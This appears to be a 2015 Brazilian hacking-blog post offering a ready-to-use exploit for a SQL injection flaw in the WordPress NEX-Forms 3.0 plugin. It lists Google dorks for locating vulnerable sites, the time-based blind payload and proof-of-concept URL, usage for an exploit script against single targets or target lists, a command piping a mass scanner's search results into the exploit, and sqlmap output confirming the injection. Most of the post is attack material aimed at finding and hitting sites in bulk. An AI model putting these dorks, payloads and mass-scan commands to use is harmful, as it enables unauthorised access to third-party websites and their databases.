Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 21 de abril de 2015

WordPress NEX-Forms 3.0 SQL Injection Vulnerability

The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  -----------------------------------------------------------------------------

# AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
# Email:        [email protected]
# Blog:          http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:    https://fb.com/InurlBrasil
# Pastebin     http://pastebin.com/u/Googleinurl
# GIT:           https://github.com/googleinurl
# PSS:           http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS:          http://google.com/+INURLBrasil

- Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
- Vulnerability discovered by: Claudio Viviani
  -----------------------------------------------------------------------------

- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
- VENTOR:       https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Dork Google:  inurl:nex-forms-express-wp-form-builder
- Dork Google:  index of nex-forms-express-wp-form-builde
- GET VULN:     nex_forms_Id=(id)
- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
  -----------------------------------------------------------------------------

- DBMS:        'MySQL'
- Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
  -----------------------------------------------------------------------------

Info:  The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
  -----------------------------------------------------------------------------

- --help:
   -t : SET TARGET.
 -f : SET FILE TARGETS.
 -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
  -----------------------------------------------------------------------------

- EXPLOIT MASS USE SCANNER INURLBR
- COMMAND: 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"

- DOWNLOAD INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
  -----------------------------------------------------------------------------

- INFO:           http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/

[!] CODE XPL:
- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability

OUTPUT PRINT: 


  OUTPUT PRINT:

OUTPUT SQLMAP: 
 [03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [03:25:12] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux
 web application technology: PHP 5.4.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12

Nenhum comentário:

Postar um comentário

............